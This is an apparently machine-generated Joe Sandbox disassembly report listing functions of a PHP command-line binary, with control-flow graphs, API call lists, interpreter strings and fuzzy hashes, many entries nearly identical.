                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Either execute direct code, process stdin or use a file.$Finished execution, repeating...$You can use -f only once.
                                                • API String ID: 3553338152-1843009292
                                                • Opcode ID: cbc51a399cb6b393726d7776a74812c159b3f4b5d0ceff1dc37e7af6ccd1ed26
                                                • Instruction ID: 8b68a6810817ab84b443c4c14397d7c86803a3c55879216696a2b40315588e52
                                                • Opcode Fuzzy Hash: cbc51a399cb6b393726d7776a74812c159b3f4b5d0ceff1dc37e7af6ccd1ed26
                                                • Instruction Fuzzy Hash: 9561E432A0CB46C6EB54BF29E444269B7B8FB44B94F944536DA4E437A8CF3CE464D720

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 810 7ff7498c21a2-7ff7498c21a9 811 7ff7498c21bb-7ff7498c21c7 810->811 812 7ff7498c21ab-7ff7498c21b6 810->812 813 7ff7498c2275-7ff7498c22b6 php_getopt 811->813 812->813 814 7ff7498c1d80-7ff7498c1d86 813->814 815 7ff7498c22bc-7ff7498c22de 813->815 814->813 816 7ff7498c1d8c-7ff7498c1df6 get_zend_version php_printf sapi_deactivate 814->816 818 7ff7498c22e0 815->818 819 7ff7498c231c-7ff7498c231f 815->819 825 7ff7498c240e-7ff7498c2413 816->825 820 7ff7498c22e7-7ff7498c22ee 818->820 822 7ff7498c2321-7ff7498c232d php_win32_console_is_own 819->822 823 7ff7498c237b 819->823 820->820 824 7ff7498c22f0-7ff7498c2317 php_output_write 820->824 826 7ff7498c232f-7ff7498c2332 822->826 827 7ff7498c236c-7ff7498c2379 822->827 828 7ff7498c237f-7ff7498c2382 823->828 829 7ff7498c266f-7ff7498c2694 sapi_deactivate zend_ini_deactivate 824->829 831 7ff7498c241f-7ff7498c2425 825->831 832 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 825->832 826->827 830 7ff7498c2334-7ff7498c2337 826->830 827->828 833 7ff7498c2384-7ff7498c23a4 call 7ff7498c1060 __acrt_iob_func fflush 828->833 834 7ff7498c23a8-7ff7498c23ad 828->834 829->825 838 7ff7498c2339-7ff7498c2340 830->838 839 7ff7498c235d-7ff7498c236a 830->839 840 7ff7498c242f-7ff7498c2436 831->840 841 7ff7498c2427-7ff7498c2429 php_request_shutdown 831->841 832->831 833->834 836 7ff7498c23af-7ff7498c23e1 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 834->836 837 7ff7498c23e6-7ff7498c23ea 834->837 856 7ff7498c24c2 836->856 844 7ff7498c24c6-7ff7498c24c9 837->844 838->839 845 7ff7498c2342-7ff7498c234f 838->845 839->828 846 7ff7498c2441-7ff7498c2446 840->846 847 7ff7498c2438-7ff7498c243b free 840->847 841->840 851 7ff7498c2506-7ff7498c2509 844->851 852 7ff7498c24cb-7ff7498c24ce 844->852 845->827 853 7ff7498c2351-7ff7498c2355 845->853 848 7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 846->848 849 7ff7498c244c-7ff7498c2455 _getpid 846->849 847->846 849->848 854 
7ff7498c245b-7ff7498c24bd __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 849->854 858 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 851->858 860 7ff7498c2588-7ff7498c259a 851->860 857 7ff7498c24d0-7ff7498c24d7 852->857 852->858 853->827 859 7ff7498c2357-7ff7498c235b 853->859 854->856 856->844 857->851 865 7ff7498c24d9-7ff7498c24e6 857->865 866 7ff7498c2526-7ff7498c2536 php_printf 858->866 867 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 858->867 859->827 859->839 862 7ff7498c25c5-7ff7498c264f php_request_startup 860->862 863 7ff7498c259c-7ff7498c259f 860->863 872 7ff7498c2651-7ff7498c2664 php_output_write 862->872 873 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 862->873 863->862 871 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 863->871 874 7ff7498c24f4-7ff7498c2502 865->874 875 7ff7498c24e8-7ff7498c24ec 865->875 876 7ff7498c266a 866->876 868 7ff7498c2564-7ff7498c2574 _strdup 867->868 869 7ff7498c2578-7ff7498c2586 867->869 868->869 877 7ff7498c25c1 869->877 871->877 872->876 879 7ff7498c273b-7ff7498c2773 zend_is_auto_global 873->879 880 7ff7498c26fb-7ff7498c26ff 873->880 874->851 875->874 878 7ff7498c24ee-7ff7498c24f2 875->878 876->829 877->862 878->851 878->874 881 7ff7498c23ef-7ff7498c2406 879->881 882 7ff7498c2779-7ff7498c2789 879->882 880->879 883 7ff7498c2701-7ff7498c2709 880->883 881->825 882->848 885 7ff7498c2710-7ff7498c271a 883->885 886 7ff7498c2720-7ff7498c2728 885->886 886->886 887 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 886->887 887->879 887->885
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Finished execution, repeating...$Source stripping only works for files.
                                                • API String ID: 3553338152-1395239938
                                                • Opcode ID: 65d906f40d2b1cad87c91d3b0134104b547da77fcb2dcbbec68ff2cde24d55b6
                                                • Instruction ID: 9676f80feb2ebf762fa7ed9955d9988335e59bb6eac3bb9d3156f7eda9f898df
                                                • Opcode Fuzzy Hash: 65d906f40d2b1cad87c91d3b0134104b547da77fcb2dcbbec68ff2cde24d55b6
                                                • Instruction Fuzzy Hash: C5510832A0CB42C6EB54BF29E444269B7B8FB44B94F944536DA4E437A8CF3CE464D720

                                                Control-flow Graph
                                                • Entry block: 7ff7498c2266-7ff7498c2271 atoi
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$atoifprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 2657596451-4259897058
                                                • Opcode ID: bdb06fa591e3e54191485d2cc3e0097ef2c008e19f655db3b2957de89980eeea
                                                • Instruction ID: ec68daef639decbf695e16e5aca15eb70bebc9a92464f1602c561455d9a9132e
                                                • Opcode Fuzzy Hash: bdb06fa591e3e54191485d2cc3e0097ef2c008e19f655db3b2957de89980eeea
                                                • Instruction Fuzzy Hash: A051F732A0CB42C6EB54BF69E844269B7B8FB44B94F944136DA4E437A8DF3CE454D720

                                                Control-flow Graph
                                                • Entry block: 7ff7498c21cc-7ff7498c21d7 zend_load_extension
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$fprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_load_extensionzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 2028098766-4259897058
                                                • Opcode ID: 1b3d15ab18ccb837026a14a309577c3a8c289e649f75982ed04d78b132899a24
                                                • Instruction ID: adfc194bd557edf5005977c23afecf2c61f084078c7af9e8847328cb2cdc9860
                                                • Opcode Fuzzy Hash: 1b3d15ab18ccb837026a14a309577c3a8c289e649f75982ed04d78b132899a24
                                                • Instruction Fuzzy Hash: 80510932A0CB42C6EB54BF69E444269B7B8FB44B94F944135DA4E437A8CF3CE464D720

                                                Control-flow Graph
                                                • Entry block: 7ff7498c27b0-7ff7498c27c1 open_file_for_scanning
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpid_strdupfflushfprintffreeopen_file_for_scanningphp_get_highlight_structphp_printfphp_request_shutdownsapi_deactivatevirtual_cwd_activatevirtual_fopenvirtual_realpathzend_destroy_file_handlezend_highlightzend_ini_deactivatezend_stream_init_fp
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 177613051-4259897058
                                                • Opcode ID: ac70d1cb09c4a103e01a0aba658b53caf54f70a4db69a60423943230d4c2490e
                                                • Instruction ID: efcc86b1407b657872a18da43171f8a28f9ebddfbca728e48b8b7de120aee67e
                                                • Opcode Fuzzy Hash: ac70d1cb09c4a103e01a0aba658b53caf54f70a4db69a60423943230d4c2490e
                                                • Instruction Fuzzy Hash: 5741E532A0CB42C6EB54BF29E854279B7B8FB44B44F944135DA4E427A8DF3CE864D720

                                                Control-flow Graph
                                                • Entry block: 7ff7498c202e-7ff7498c2032
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 3553338152-4259897058
                                                • Opcode ID: 6d54f0acc1ee76f4485067c6dbf453e35cee6cdff82eb98f872bc53b249bfa8a
                                                • Instruction ID: 1c8a25662710b93503582356918078a0e669bd8060c6a3247cb13f0d8afb5878
                                                • Opcode Fuzzy Hash: 6d54f0acc1ee76f4485067c6dbf453e35cee6cdff82eb98f872bc53b249bfa8a
                                                • Instruction Fuzzy Hash: CF511632A0CB42C6EB54BF29E444269B7B8FB44B94F944136DA4E437A8CF3CE464C720
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$fprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 1243356579-4259897058
                                                • Opcode ID: 525ae0eb10930a3505e2517b51df5a8cd0162de87376be0806038f6245af0f10
                                                • Instruction ID: bf40580b41a665f66e603cdb1f5f050edbb9e8ee5d4878c3007d4bdd15b0c8fd
                                                • Opcode Fuzzy Hash: 525ae0eb10930a3505e2517b51df5a8cd0162de87376be0806038f6245af0f10
                                                • Instruction Fuzzy Hash: AB510832A0CB42C6E754BF69E444269B7B8FB44B94F944135DA4E437A8CF3CE464D720
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$fprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 1243356579-4259897058
                                                • Opcode ID: 6143378ca0428e450cd900715ae6fa06231304171325d6e11f2286a64efb4e43
                                                • Instruction ID: 5cad7bb5373e4abec04d290284c9c5523f0bb5af9382d3aebb71771468c5d251
                                                • Opcode Fuzzy Hash: 6143378ca0428e450cd900715ae6fa06231304171325d6e11f2286a64efb4e43
                                                • Instruction Fuzzy Hash: 20510732A0CB42C6EB54BF69E444269B7B8FB44B94F944136DA4E437A8CF3CE464D720
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$fprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 1243356579-4259897058
                                                • Opcode ID: e1a9e1359cf5cad40f8b8df73d477b35c60c4717a7ec2d5480bceb5a937f2db5
                                                • Instruction ID: 943bfb065064e56453daf8df64c7026f031c9077acf5fadacd6e5ad6a4e33721
                                                • Opcode Fuzzy Hash: e1a9e1359cf5cad40f8b8df73d477b35c60c4717a7ec2d5480bceb5a937f2db5
                                                • Instruction Fuzzy Hash: FD510732A0CB42C6EB54BF69E444269B7B8FB44B94F944136DA4E537A8CF3CE464D720
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$fprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 1243356579-4259897058
                                                • Opcode ID: 9218e46d3a4c7e09d4acfa8916fffc3c79c1739510ff5da9eee1b1ba186f1300
                                                • Instruction ID: 999e8af8ab05720109094272db08dc7a404aa6865e56f1e9a5b5a504142a0f62
                                                • Opcode Fuzzy Hash: 9218e46d3a4c7e09d4acfa8916fffc3c79c1739510ff5da9eee1b1ba186f1300
                                                • Instruction Fuzzy Hash: 4A510732A0CB42C6EB54BF69E444269B7B8FB44B94F944136DA4E437A8CF3CE464D720
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$fprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 1243356579-4259897058
                                                • Opcode ID: c441f781a3f2e7fcfee351602fa74d73ccd1fddc9563abb88a5ce4646694a6e8
                                                • Instruction ID: dfc948ccc1ccde4adc183dd72ce6950a91820e3d3d5a6f174a645b384e8badfa
                                                • Opcode Fuzzy Hash: c441f781a3f2e7fcfee351602fa74d73ccd1fddc9563abb88a5ce4646694a6e8
                                                • Instruction Fuzzy Hash: 9E510732A0CB42C6EB54BF69E444269B7B8FB44B94F944136DA4E437A8CF3CE464D720
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$fprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 1243356579-4259897058
                                                • Opcode ID: 3848285235c1627fe79e923a606bd2e675f1e66757d41223d7de2e318ad898cb
                                                • Instruction ID: 3e94fc263c2282f2e0d3de2e120ea22c577e6e4f78c4f0444083f7471dc475c6
                                                • Opcode Fuzzy Hash: 3848285235c1627fe79e923a606bd2e675f1e66757d41223d7de2e318ad898cb
                                                • Instruction Fuzzy Hash: 6E510832A0CB42C6EB54BF69E444269B7B8FB44B94F944536DA4E437A8CF3CE464D720
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$fprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 1243356579-4259897058
                                                • Opcode ID: 375e325812b55d1bcc3cf7a7f965873d10f6e755133bc88264a4c209ae73991f
                                                • Instruction ID: 34051c189341323700d86667cc5217b4bccef9985bd76c2b9da3fa85622c19ef
                                                • Opcode Fuzzy Hash: 375e325812b55d1bcc3cf7a7f965873d10f6e755133bc88264a4c209ae73991f
                                                • Instruction Fuzzy Hash: DA510832A0CB42C6EB54BF69E444269B7B8FB44B94F944136DA4E437A8CF3CE464D720
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpid_strdupfflushfprintffreeopen_file_for_scanningphp_printfphp_request_shutdownsapi_deactivatevirtual_cwd_activatevirtual_fopenvirtual_realpathzend_destroy_file_handlezend_ini_deactivatezend_stream_init_fpzend_strip
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 1824308970-4259897058
                                                • Opcode ID: bc30af71d3d4de4b2f806a6d90d3efcff2e60aa20fa675fa07f5427c5e754180
                                                • Instruction ID: f2c02878b89e1c4724183ecb7abce70c16ee5847c248199f941d49e4fe763590
                                                • Opcode Fuzzy Hash: bc30af71d3d4de4b2f806a6d90d3efcff2e60aa20fa675fa07f5427c5e754180
                                                • Instruction Fuzzy Hash: AD410622A0CB42C6E754BF29E854279B7B8FB44B84F944135DA4E437A8DF3CE864D720
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _php_stream_free_php_stream_open_wrapper_exzend_register_constant
                                                • String ID: STDERR$STDIN$STDOUT$php://stderr$php://stdin$php://stdout
                                                • API String ID: 3934693553-2640790700
                                                • Opcode ID: 4267e5853ad279fd12b8117adbdccc7bc263f0a3bc04d57c20377e3dce11e3d5
                                                • Instruction ID: 4b0a005ae61ac840a655d7641e20ec903cc6de3b459e4d6d27fa4125fda07175
                                                • Opcode Fuzzy Hash: 4267e5853ad279fd12b8117adbdccc7bc263f0a3bc04d57c20377e3dce11e3d5
                                                • Instruction Fuzzy Hash: A7512732A1DB46C2EB50BF19E458A69B7B8FB44B84F844131DA8D03B64DF7CE469CB10
                                                APIs
                                                Strings
                                                • html_errors=0register_argc_argv=1implicit_flush=1output_buffering=0max_execution_time=0max_input_time=-1, xrefs: 00007FF7498C3314
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: free$FreeLocalexitphp_ini_builder_prependphp_module_shutdownphp_win32_cp_cli_do_restoresapi_shutdownsapi_startuptsrm_shutdown
                                                • String ID: html_errors=0register_argc_argv=1implicit_flush=1output_buffering=0max_execution_time=0max_input_time=-1
                                                • API String ID: 3326966299-87643557
                                                • Opcode ID: 4ebc085102a416455d69f64ef736fa800ecfdd36669855039c8035c4adac4222
                                                • Instruction ID: 2441d41a8c801c9df337b8ad7de1c948b672992221268988297880afdfb05f25
                                                • Opcode Fuzzy Hash: 4ebc085102a416455d69f64ef736fa800ecfdd36669855039c8035c4adac4222
                                                • Instruction Fuzzy Hash: 2A41313260D782CAE712BF38E4542ADBBB4FB45B54F844076CA8D47296CF3DA469D720
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
